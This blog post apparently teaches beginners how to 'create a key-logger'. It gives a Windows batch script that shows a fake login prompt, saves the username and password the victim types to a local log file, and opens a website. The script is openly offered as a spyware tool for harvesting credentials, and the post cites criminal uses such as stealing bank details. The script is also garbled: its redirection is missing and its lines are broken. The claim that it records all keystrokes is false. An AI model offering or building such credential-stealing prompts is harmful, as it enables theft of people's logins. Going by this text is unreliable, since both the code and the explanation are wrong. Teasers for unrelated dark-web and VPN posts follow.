Skip to main content

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad.

What is Key-logger?

 A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information.


HOW TO MAKE A KEY-LOGGER?

 Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad.

  • Open notepad on your Windows and paste the script given below.
@echo off 
color a
title Login
cls
echo Please Enter Your Email Address and Password
echo.
echo.
cd C:\Logs
set /p user= Username:
set /p pass=Password:
echo Username="%user%"
Password="%pass%"
Log.txt
start
http://TechiViewer.com/
exit


  • Now save the notepad file as logs.bat in the desktop

  • After that, create a new folder and name it "Logs" and move it to C drive.

  • It's time the file log.bat. Double click on the log.bat file which placed on your desktop and then enter username and password.

  • Now head over to C drive where you have placed the log folder.Open the folder and you will see a notepad key-logger which will display you the username and password.
With the help of the above steps , you can record all the various key-strokes of the keyboard which have been entered or used in batch file.This trick is just to tell you about how key-loggers work. 


Comments

Post a Comment

Popular posts from this blog

A beginner’s guide to the dark web

What is the dark web? There are basically three parts to the world wide web: surface web, deep web, and dark web. The surface web is everything that’s publicly available and accessible through search or typing a URL into your browser. The deep web , also known as the invisible web, is all the content on the web that is not indexed by standard search engines, such as email clients, online banking websites, or pages that are inaccessible to crawlers, the software that indexes the web for search engines. Some of those pages can still be accessed if you have the URL while others require you to have login credentials. According to expert estimates, the deep web is 500 times larger than the surface web. The dark web, however, is a totally different beast—a tiny fraction of the web that is only accessible through specialized software such as the Tor browser. However, the term “dark web” is also often used to refer to the darknet, the overlay networks that are used to an...

WHAT IS A VPN IS ALL ABOUT?

What is a VPN? A VPN creates a secure, encrypted “tunnel” over the internet between your computer, smartphone or tablet and whatever website or app you are trying to access. This is made possible by redirecting your connection via a VPN server in another country, which makes it appear to a website or application that you are just another ‘local’ visitor. You become effectively anonymous as your IP address (the numerical label that identifies your device’s online connection) is replaced with that of the VPN server. All you need in order to do this is a VPN app on your device and an affordable subscription. The best VPNs work across laptops, desktops, smartphones and tablets – even a Smart TV, with the aid of an ethernet cable or a Chromecast dongle. When you want to mask your real location, simply launch the VPN app, select the country from which you want to connect then off you go! After that, simply use your browser and any apps as you would normally do. How do I conn...